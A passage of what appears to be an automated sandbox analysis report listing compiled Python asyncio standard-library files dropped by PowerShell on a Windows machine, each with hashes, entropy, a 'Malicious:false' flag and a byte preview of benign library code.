                              Preview:.........U.f..........................Z.....d.d.l.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z...G.d...d.e.j...........................Z.y.)......N...............g......N@g......>@i.........i....i,...c.....................r.....e.Z.d.Z...e.j...........................Z...e.j...........................Z...e.j...........................Z.y.)..._SendfileModeN)...__name__..__module__..__qualname__..enum..auto..UNSUPPORTED..TRY_NATIVE..FALLBACK........OC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\constants.pyr....r....&...s).........$.).).+.K............J....t.y.y.{.Hr....r....).r.....!LOG_THRESHOLD_FOR_CONNLOST_WRITES..ACCEPT_RETRY_DELAY..DEBUG_STACK_DEPTH..SSL_HANDSHAKE_TIMEOUT..SSL_SHUTDOWN_TIMEOUT.!SENDFILE_FALLBACK_READBUFFER_SIZE. FLOW_CONTROL_HIGH_WATER_SSL_READ.!FLOW_CONTROL_HIGH_WATER_SSL_WRITE..THREAD_JOIN_TIMEOUT..Enumr....r....r....r......<module>r........s^................%&..!...................................%/..!.#&.. .$'..!..............D.I.I.....r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3808
                              Entropy (8bit):5.19912182953302
                              Encrypted:false
                              SSDEEP:48:ICshgl/Cunop8DE/cLQc8Q7fMEoYeIEfMR32gSwlooumiAImqJkUGXH:4hgl/waDE/cLGOkn7MN2gplpzvnqJkrX
                              MD5:4CD67864B6A7000FFCF2CF8C132F7492
                              SHA1:0661E09E6628F83793CD721A55874B5E938512A5
                              SHA-256:A7BCA2096843030E2E2CE1FD38D13441D002C9936BFA7F543EF7779610BE2AAA
                              SHA-512:512D6A160BA5CF58A8BA7963723450056C214755F50CA8D4F5075F381A2068052E4950D7A4EA33F1F11EED7D36CE0BB633DF4DC5C3E67EB956731845038114EB
                              Malicious:false
                              Preview:.........U.f{..............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d...Z...e.........Z.d...Z.e.j...................e.j...................j...................f.Z...e.........Z.d...Z.d...Z.y.).)...iscoroutinefunction..iscoroutine.....Nc...........................t.........j...................j...................x.sE..t.........j...................j.....................x.r(..t.........t.........j...................j...................d.................S.).N..PYTHONASYNCIODEBUG)...sys..flags..dev_mode..ignore_environment..bool..os..environ..get........PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\coroutines.py.._is_debug_moder........sF.........9.9..........N..c.i.i.&B.&B."B...#M.."&.r.z.z.~.~.6J.'K."L....N.r....c.....................V.....t.........j...................|.........x.s...t.........|.d.d.........t.........u.S.).z6Return True if func is a decorated coroutine function..._is_coroutineN)...inspectr......getattrr....)...funcs.... r....r...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):36792
                              Entropy (8bit):5.124907669725236
                              Encrypted:false
                              SSDEEP:768:6eSkuOtRv7+Ue1Si9IAjRyHUDP47jgLzBabgsq+Qi:DtRi9lYHUDP47jU1abgsqZi
                              MD5:726895B47C74E72F564E80BAD891CDE7
                              SHA1:FA6FA922E2B8E4A96AFA5288D1FBEC8B15EAF102
                              SHA-256:A50B9DC62CFB84F2AC9B7AF31EB6DD510C9049D77AAF32EE669FF952DEE29286
                              SHA-512:AB008B62BDA84D054B788D5B8C9BA230E06DD428FDD544A306F59749437164C6E33BADB1BA307BF69459447CE69D69C5690161DB2EFF89AB1AE9DFF16D5559B5
                              Malicious:false
                              Preview:.........U.f.u..............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.........Z...G.d...d.e.........Z.d.a...e.j$..........................Z...G.d...d.e.j(..........................Z...e.........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!e.Z"e.Z#e.Z$e.Z%..d.d.l&m.Z.m.Z.m.Z.m.Z...e.Z'e.Z(e.Z)e.Z*..e,e.d ........r.d!..Z-..e.j\..................e-."..........y.y.#.e+$.r...Y..(w.x.Y.w.)#z!Event loop and event loop policy.)...AbstractEventLoopPolicy..AbstractEventLoop..AbstractServer..Handle..TimerHandle..get_event_loop_policy..set_event_loop_policy..get_event_loop..set_event_loop..new_event_loop..get_child_watcher..set_child_watcher.._set_running_loop..get_running_loop.._get_running_loop.....N.....)...format_helpersc.....................@.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....z1Object returne
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3120
                              Entropy (8bit):5.119901193880007
                              Encrypted:false
                              SSDEEP:48:KyE7XnQDZ5vrATxMU7w1C+AsjLEhkg6Pox3f0Ht6k4TeRPrt1ZrHGGRDxQEaHti:KlEDZ5cTWjn0kF+MN7RJrJVxQEaNi
                              MD5:737F45D1EA70F49ADCDDEEF6CCF4C1B7
                              SHA1:E691FF4E9A8B08FCF92EFC2FB7375717D2379BE5
                              SHA-256:1BB667DAA38A46A3EED283EF0F5793B56A8D081BCB4BFC00CAB4E2D3129C307C
                              SHA-512:4D49E3439A62E7768F67A33A3185FAEB231B5755404123C6C7C00DDFBBAB5FDE5E1F668593930D27A15276CE2BE03030AD19A1A82D837DB728FF08A93D661E88
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.Z...G.d...d.e.........Z.e.Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z.asyncio exceptions.)...BrokenBarrierError..CancelledError..InvalidStateError..TimeoutError..IncompleteReadError..LimitOverrunError..SendfileNotAvailableErrorc...........................e.Z.d.Z.d.Z.y.).r....z!The Future or Task was cancelled.N....__name__..__module__..__qualname__..__doc__........PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\exceptions.pyr....r........s........+r....r....c...........................e.Z.d.Z.d.Z.y.).r....z+The operation is not allowed in this state.Nr....r....r....r....r....r........s........5r....r....c...........................e.Z.d.Z.d.Z.y.).r....z~Sendfile syscall is not available... Raised if OS does not support sendfile syscall for given socket or. file type.. Nr....r....r....r....r....r........s...........r....r....c..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3904
                              Entropy (8bit):5.034862730062316
                              Encrypted:false
                              SSDEEP:48:syUTnlvQPxb/WvlA5XP6wfppV0Rs35vLy2uIjNQTeRQZtsSp1AXhmLV/xWNRTtBg:XUp8/Wv65xV08ujtsSp1AoLbWXvg
                              MD5:9DAB564E8AAEDD117B1761ABBC262DD6
                              SHA1:6052C1BC426D9E60266C5B012AA79CC3CACA5032
                              SHA-256:0583D9AAA86DF2AF9E2A3EDDB71EB632DDA3B22E81DC3601CECF402793AA58DF
                              SHA-512:C39BC9E610C685777D01F4AB89BEB92F5F685F9CEC3BBE13CD6B567F7125B3B16BBFA5D5C36420FBAB9B01AEF8A20B9CFDC2B3DD078D57FDF2165462DAB228B6
                              Malicious:false
                              Preview:.........U.f..........................Z.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d...Z.d...Z.d...Z.d.d...Z.d.d...Z.y.)......N.....)...constantsc.....................\.....t.........j...................|.........}.t.........j...................|.........r$|.j...................}.|.j...................|.j...................f.S.t.........|.t.........j...........................r.t.........|.j...........................S.t.........|.t.........j...........................r.t.........|.j...........................S.y...N)...inspect..unwrap..isfunction..__code__..co_filename..co_firstlineno..isinstance..functools..partial.._get_function_source..func..partialmethod).r......codes.... .TC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\format_helpers.pyr....r........s..........>.>.$....D..........$.......}.}....... .. .$."5."5..6..6....$....)..)..*..#.D.I.I..........$..../../..0..#.D.I.I..............c.....................\.....t.........|.|.d.........}.t........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):17295
                              Entropy (8bit):5.1416381607118975
                              Encrypted:false
                              SSDEEP:192:3jcQYTKBWBKG0fSKcf0p/oyV12GBfF1RwyO6PQ1WftZTEapbuB/m6Aa0xr4z:3jcWYKG0fSKp1oE12GA6ooAaFqm//t8
                              MD5:3B80CDEB25A39848C5C827D59B91CED7
                              SHA1:B193FAB28FCF3F467FB08CDC1C13DECE597D5994
                              SHA-256:CE20E531DF03CC01D0014F51347900309A1C035D04C46B052C5643ECB39ACA03
                              SHA-512:D835CC0AEAB31BA1CA1C82DB94A1A84FC16663CFD09A1ACC14110829057131BDB68E89E03CAEC406302A1F4D88C2E6DF1B4E7E2688A0A5B9A922D469FD0B47A8
                              Malicious:false
                              Preview:.........U.f.9........................j.....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.j...................Z.e.j...................Z.e.j ..................Z.e.j"..................Z.e.j$..................d.z...Z...G.d...d.........Z.e.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...d...Z...d.d.l.Z.e.j(..................x.Z.Z.y.#.e.$.r...Y.y.w.x.Y.w.).z.A Future class similar to the one in PEP 3148.)...Future..wrap_future..isfuture.....N)...GenericAlias.....)...base_futures)...events)...exceptions)...format_helpersc...........................e.Z.d.Z.d.Z.e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d...d...Z.d...Z.d...Z...e.e.........Z.e.d...........Z.e.j,..................d...........Z.d...Z.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...d...Z.d...Z d...Z!d...Z"d...Z#e#Z$y.).r....a,...This class is *almost* compatible with concurrent.futures.Future... Differences:.. - This class is not thread-safe... - result() and exception() do
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):27541
                              Entropy (8bit):5.196588364412371
                              Encrypted:false
                              SSDEEP:384:ljHiMFBEimzqgceh2NXVEMrbKpJm10UGNwMJEyJa1p2nFhudL:lWIEsg58N/rbKpJ80Up0EQFF0L
                              MD5:92861DEC5FFEDEEDE4DA9E0D5448822B
                              SHA1:ED5B7509FFB553819FD7AEC2E88F81785C72D08D
                              SHA-256:3462BD7AD46C68FCCC8175A01DE6767D627BAE4F87CDF9A73F6E9A4CBD875222
                              SHA-512:32EAF086223387D088C6E597D7C0F5B64D3C57F4E163580009A3C05B08730FC38214043FD9ECA6D96A4D9A2B75D0D681FA5E8F20AC72B3B88F269CC2BB1C2F16
                              Malicious:false
                              Preview:.........U.f|L........................`.....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z...G.d...d.e.e.j...........................Z...G.d...d.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.y.).z.Synchronization primitives.)...Lock..Event..Condition..Semaphore..BoundedSemaphore..Barrier.....N.....)...exceptions)...mixinsc...........................e.Z.d.Z.d...Z.d...Z.y.)..._ContextManagerMixinc.....................@...K.....|.j.............................d.{.............y.7.....w...N)...acquire....selfs.... .KC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\locks.py..__aenter__z._ContextManagerMixin.__aenter__....s.............l.l.n.................s................c.....................,...K.....|.j.............................y...w.r....)...release).r......exc_type..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):320
                              Entropy (8bit):5.1617483344269965
                              Encrypted:false
                              SSDEEP:6:hytJ6SBY2lFlXmN+QIwK06oMDfU4/5jDn23d6ri5o2akt6/FpwUn:hytQSB/h46oMg4/ZSIrao2akt6dpl
                              MD5:109965177707CCF74B23774BFECE4DAC
                              SHA1:687AA31C1E8324D7D46BE0AF5D292B054827BA09
                              SHA-256:B2E6CE020022E62BBF4DB45A9BED716E99BDC15F94CA722C1551B79C3BAC3A62
                              SHA-512:C5D4CE31886E24003500165C561C3464E80FAAD96D91E2BB6D95984ABD67B21FC547D507C6362E17B9F1ECE40A4BE3E7BECD0FEB9E5448300DF661004484A57D
                              Malicious:false
                              Preview:.........U.f..........................4.....d.Z.d.d.l.Z...e.j...................e.........Z.y.).z.Logging configuration......N)...__doc__..logging..getLogger..__package__..logger........IC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\log.py..<module>r........s.............................;..'..r....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1075
                              Entropy (8bit):5.158530226917072
                              Encrypted:false
                              SSDEEP:24:h09R+K6kxpNnWlWS1KMWhzovYlIne8fZ8ak5m6FwJ:q/2kzYlDbW5ovaeeYCm6U
                              MD5:3E8A18A0856091294CF299E7A3C8132E
                              SHA1:EAF21C3B7BA71D76B405ACECF9DA8CE9F1C27D11
                              SHA-256:A79AB6A65D2B8D08109CC156234CFE0AD4D3369C248F0F1A39C67E7F48EB6CB5
                              SHA-512:74A926674F4DE3146C749159F6B2F86480DF421B7896AA8E95415ECC2B98C23D50FE31F6330DDB3E802365AA734E39EF5030F799D01F6C280754D99921BD61EA
                              Malicious:false
                              Preview:.........U.f..........................R.....d.Z.d.d.l.Z.d.d.l.m.Z.....e.j...........................Z...G.d...d.........Z.y.).z.Event loop mixins......N.....)...eventsc...........................e.Z.d.Z.d.Z.d...Z.y.)..._LoopBoundMixinNc...........................t.........j...........................}.|.j...................."t.........5...|.j.....................|.|._.........d.d.d...........|.|.j...................u.r.t.........|...d.............|.S.#.1.s.w...Y......'x.Y.w.).Nz# is bound to a different event loop).r......_get_running_loop.._loop.._global_lock..RuntimeError)...self..loops.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\mixins.py.._get_loopz._LoopBoundMixin._get_loop....si..........'..'..)......:.:..........&....:.:..%.!%.D.J....&......t.z.z..!....$...)L..M..N..N.........&....&.s......A!..!.A*.)...__name__..__module__..__qualname__r....r...........r....r....r........s..........E.....r....r....)...__doc__..threading..r......Lockr....r....r....r.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):44597
                              Entropy (8bit):4.888441667121427
                              Encrypted:false
                              SSDEEP:768:8sffi3/xLMBqwSdX5o+Hm6m9npYUH6Tn8UtT:d636lPVHm8UtT
                              MD5:FDF97827EC36746B1ED6C299EEC22195
                              SHA1:C911D773BAB8139DA23194A2CAB3249F0E06A9A8
                              SHA-256:13B1574254EEC728D250B7585279CE6C9A9649F7122D1C506064458BC8151C3E
                              SHA-512:1E9AF5CBDF2BF46527417408C5D58F884EEE881E999D96F82E1695E92A0483CF4417D1AB45ED1388567DAB6B471E53CCC6EF86F0C8F8BE8C9324D24A56E5C789
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j*..................e.j,..........................Z...G.d...d.e.e.j0..........................Z...G.d...d.e.e.j4..........................Z...G.d...d.e.........Z...G.d...d.e.e.j:..........................Z...G.d...d.e.e.e.j>..........................Z ..G.d...d.e.e.e.j>..........................Z!..G.d...d.e.jD..........................Z#y.).z.Event loop using a proactor and related classes...A proactor is a "notify-on-completion" multiplexer. Currently a.proactor is only implemented on Windows with IOCP..)...BaseProactorEventLoop.....N.....)...base_events)...constants)...futures)...exceptions)...protocols)...sslproto)...transports)...trsock)...loggerc...........................t.........j...................|.........|.j...................d.<.....|.j.....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8821
                              Entropy (8bit):5.0766910139161165
                              Encrypted:false
                              SSDEEP:96:AgvYrjFENMeh09PE+o8jw0Opi3rRDiAzo63UO8fygfpxFLw7bf/dE:Agvc6vFRuwtsr46F8fNfp0n3dE
                              MD5:D73161E3DD5422BF36FA00170C79F725
                              SHA1:4F00A83DA8B1EAD7F9654ADC112E207733BBC004
                              SHA-256:DF2B2731DA2321913AC0DBBFB82173799B0816B4EB66F59DE59999D1153219E6
                              SHA-512:21C9D576C0ACE3C470B29F5338CF64EA09F0796C560A8C05A488E9124B67B8FBB997216D5FD6A1BEBCC2B2A9B853D2F4359372ECE57DE821495C0B8ECD5FC9F2
                              Malicious:false
                              Preview:.........U.f..........................~.....d.Z.d.Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.d...Z.y.).z.Abstract Protocol base classes.)...BaseProtocol..Protocol..DatagramProtocol..SubprocessProtocol..BufferedProtocolc.....................,.....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.y.).r....a....Common base class for protocol interfaces... Usually user implements protocols that derived from BaseProtocol. like Protocol or ProcessProtocol... The only case when BaseProtocol should be implemented directly is. write-only transport like write pipe. ..c...........................y.).z.Called when a connection is made... The argument is the transport representing the pipe connection.. To receive data, wait for data_received() calls.. When the connection is closed, connection_lost() is called.. Nr....)...self..transports.... .OC:\Users\boadi\AppData\Local\Programs\Python\Python312\L
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11980
                              Entropy (8bit):5.011989678092306
                              Encrypted:false
                              SSDEEP:192:SrcyPQBVX1Y7Gl1EiieYBuZQB/4MWlLujXbrSagmSq:8ccQ31jERYQglLuTPSagmP
                              MD5:843DA116A02DB8615EA271ACCFE64449
                              SHA1:FFF9CBFB4546A84F8E9E0C040CC405158046783A
                              SHA-256:813BD1972737DC48040AB4E49F1B8E3EC7A87624746753C2A8E7E3C5A27DA2A1
                              SHA-512:5719654A3B00AC42ADB0A15565B7B1F2D2B76B1B83A1EFF100C36DEB8545B21A6968DAF568CB0A1D19995EB342838AB5F40398B54F2ECA149B04671F952053C6
                              Malicious:false
                              Preview:.........U.f. .............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).)...Queue..PriorityQueue..LifoQueue..QueueFull..QueueEmpty.....N)...GenericAlias.....)...locks)...mixinsc...........................e.Z.d.Z.d.Z.y.).r....z;Raised when Queue.get_nowait() is called on an empty Queue.N....__name__..__module__..__qualname__..__doc__........LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\queues.pyr....r........s........E...r....r....c...........................e.Z.d.Z.d.Z.y.).r....zDRaised when the Queue.put_nowait() method is called on a full Queue.Nr....r....r....r....r....r........s........N...r....r....c..........................e.Z.d.Z.d.Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z...e.e.........Z.d...Z.d...Z.e.d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....a....A queue, useful
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):9975
                              Entropy (8bit):5.061692942980297
                              Encrypted:false
                              SSDEEP:192:BJwv8p+I8CaeMtMHSs+BJpxihtx4dhojAgP+:gE8INxUtdHq+
                              MD5:942E348F449BE897AC2754647602FDAE
                              SHA1:D2B34F6692CA81D570CF4779F0E319C70659D62C
                              SHA-256:982F84FC20E585AA4ECB25BA3530B0D5A8FD4A3D1AA04879C4046FF550F53267
                              SHA-512:AC19BB809FAB7D86160B87FA326FBA3E2C5492578C5120C09D87256E4E85C07172292063F15EAC740D3387A3A4B9E011E6ACFA43C965AEC40DE4F54EFE433B51
                              Malicious:false
                              Preview:.........U.f...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j...........................Z...G.d...d.........Z.d.d.d...d...Z.d...Z.y.).)...Runner..run.....N.....)...coroutines)...events)...exceptions)...tasks)...constantsc...........................e.Z.d.Z.d.Z.d.Z.d.Z.y.)..._State..created..initialized..closedN)...__name__..__module__..__qualname__..CREATED..INITIALIZED..CLOSED........MC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\runners.pyr....r........s..........G....K....Fr....r....c.....................N.....e.Z.d.Z.d.Z.d.d.d...d...Z.d...Z.d...Z.d...Z.d...Z.d.d...d...Z.d...Z.d...Z.y.).r....a5...A context manager that controls event loop life cycle... The context manager always creates a new event loop,. allows to run async functions inside it,. and properly finalizes the loop at the context manager exit... If debug is True, the event loop will be run
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):63115
                              Entropy (8bit):4.944652719030144
                              Encrypted:false
                              SSDEEP:768:KdLDC2tta4d7wIKSNSdc8ynjD79pE904h89Vx4Q3csIEp/8ecTVYrxLjxW:K4j8MSMSP92iClliVLjxW
                              MD5:2D67F3FA2AA4E3659EBC766F4D07C47F
                              SHA1:697B1DF5F69F7856ED2C77B5C2968D35274A7F44
                              SHA-256:9C945346C8F5E1591E360147E5B202F8B0499C2277BEC2B5F310C5D85998B89F
                              SHA-512:A8F0CE2EFC0447CF365016722D71E144ACB53D78F38BA3E4EABBED2856EEFA6194CCEE8B050EC3BD287A8744622FD78A06EA340A0B26B6BAE9B9B7858B30CFE7
                              Malicious:false
                              Preview:.........U.f................................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.e.j...................d.........Z.e.r.....e.j4..................d.........Z.d...Z...G.d...d.e.j<..........................Z...G.d...d.e.j@..................e.jB..........................Z"..G.d...d.e"........Z#..G.d...d.e"e.jH..........................Z%y.#.e.$.r...d.Z.Y...w.x.Y.w.#.e.$.r...d.Z.Y..pw.x.Y.w.).z.Event loop using a selector and related classes...A selector is a "notify-when-ready" multiplexer. For a subclass which.also includes support for signal handling, see the unix_events sub-module..)...BaseSelectorEventLoop.....N.....)...base_events)...constants)...events)...futures)...protocols)...sslproto)...transports)...trsock)...logger..sendmsg..SC_IOV_MAXFc.....................t.......|.j...................|.........}.t.........|.j...
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):41586
                              Entropy (8bit):4.950544759625523
                              Encrypted:false
                              SSDEEP:768:pT1lLDxKNk+2fwaI+6Z39I00fPuccyEzPEU:tLDxG2fwap49I7fmcWsU
                              MD5:3E38AEC0E4655541A8AD7F559199C5DB
                              SHA1:7C0F3361E267FB796CF8AB7BFD312057322B990C
                              SHA-256:C48E12A819B9111F1DE465E0DD069974671C8438ED0D181011A597D9940835C4
                              SHA-512:54C22E1741C4F73D0B4E3FDCC7E4E1AF4491BC97230BB2D4B6CFF1B9063B13B4EE7F061B8FB34C8D880C9D575553BA60CF117F3D5D12623CCF6DB5CCCDCA6F85
                              Malicious:false
                              Preview:.........U.f..........................z.....d.d.l.Z.d.d.l.Z.d.d.l.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e...e.j...................e.j...................f.Z...G.d...d.e.j...........................Z...G.d...d.e.j...........................Z.d...Z.d...Z...G.d...d.e.j(..................e.j*..........................Z...G.d...d.e.j...........................Z.y.#.e.$.r...d.Z.Y...w.x.Y.w.)......N.....)...constants)...exceptions)...protocols)...transports)...loggerc..................... .....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)...SSLProtocolState..UNWRAPPED..DO_HANDSHAKE..WRAPPED..FLUSHING..SHUTDOWNN)...__name__..__module__..__qualname__r....r....r....r....r............NC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\sslproto.pyr....r........s..........I..!.L....G....H....Hr....r....c...........................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)...AppProtocolState..STATE_INIT..STATE_CON_MADE..STATE_EOF..STATE_CON_LOSTN).r....r....r....r....r....r....r.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6279
                              Entropy (8bit):5.614059940548337
                              Encrypted:false
                              SSDEEP:96:0gP1xMFotrZhmRyVqfMnyxJYpakQIwshGF1dpAs+0dftWh8EmH8Oz7k83chCXwS:0gtQodpNxKUspdftWhPGbc4Xf
                              MD5:5F495819E251A76339718A4F6D83AF4F
                              SHA1:505A0E17C278DC6F47663CDBECF17D695DA6F333
                              SHA-256:3848B8585992E18C43F550E290DA1EA484A5B27A5E9B942F529C290AE2F13ED3
                              SHA-512:02A17D1E45EE7B0D4A649A787BA973D5EA5927A4E561F772C95BE087F9E44C6E63A1C39A40B5BF1D2237C17CED603FC3791C29179E9C5FF2B115289F01F95BB3
                              Malicious:false
                              Preview:.........U.f..........................f.....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...d.e.j...................e.j...................g.e.j...................f.........d.e.j...................e.....d.e.j...................d.e.j ..................e.j"..................e.j...................e.....e.j&..................e.j...................e.........f.....f.d...Z.y.).zFSupport for running coroutines in parallel with staggered start times.)...staggered_race.....N.....)...events)...exceptions)...locks)...tasks)...loop..coro_fns..delayr......returnc........................................K.......x.s...t.........j.............................t.........|...........d...d...g...g...d.t.........j...................t.........j.......................d.d.f.................f.d.......j.......................d.................}...j...................|.............d.}.|.t...................k7..r.t.........j...............................d.{...........\...}.}.t........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):33419
                              Entropy (8bit):5.155141601501448
                              Encrypted:false
                              SSDEEP:768:8kNOdmtuq46S/nUrUkhI4ozUldfQz561dWCsK9i:OosqSsQkuhz361ZQ
                              MD5:CAC6B83BDF35505A89F6CDD52ABD1A76
                              SHA1:7E0D92B0903ECEE4A410A7F30A4D73A1E5B32C59
                              SHA-256:73CD56C695F310DEE108AA5A973D38A491FFAEBB8BDA490ADF3DA80855C8B4C2
                              SHA-512:B83155F5CAF690C332BFC2AD6181C5F51ED0CA68840CF42D6BE12404EC16597D89DC9F38E1BEB649A353AD717B68C820154178D0C2C65B343AF4C5B1FC13BCD9
                              Malicious:false
                              Preview:.........U.f.n........................l.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z...e.e.d.........r.e.d.z...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.e.d...d...Z.d.e.d...d...Z...e.e.d.........r.d.e.d...d...Z.d.e.d...d...Z...G.d...d.e.j,..........................Z...G.d...d.e.e.j,..........................Z...G.d...d.........Z...G.d...d.........Z.y.).)...StreamReader..StreamWriter..StreamReaderProtocol..open_connection..start_server.....N..AF_UNIX)...open_unix_connection..start_unix_server.....)...coroutines)...events)...exceptions)...format_helpers)...protocols)...logger)...sleepi....)...limitc...........................K.....t.........j...........................}.t.........|.|...........}.t.........|.|...............|.j.....................f.d...|.|.f.i.|.......d.{...........\...}.}.t.........|...|.|.........}.|.|.f.S.7.....w.).a....A wrapper for create_connection() returning a (reader, writer) pair... The reader returned is
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):12135
                              Entropy (8bit):4.940850970054044
                              Encrypted:false
                              SSDEEP:192:0oSmXGz3GTSxVBpaVsw06K/3ypaYHEAOjRn0R/yJ:Hm3GTS/Osxy3EXjQm
                              MD5:184E33D2A14B4E4F12AB68B8CB0DF433
                              SHA1:C40DE0CA50C677639448F6A8483F3C3FEE7AC6ED
                              SHA-256:F3A1B313E6AC96061A44F1D915E87A94507D8E64CF817A68E01BB406B58FB988
                              SHA-512:FAB984475ADA4AA3A4C39087AED98890CF7A7436C4061E8927DF1606A8EABDFED962D9AAE358B3524642C08C0906C24BC703FC9808676D8377C2B33386190562
                              Malicious:false
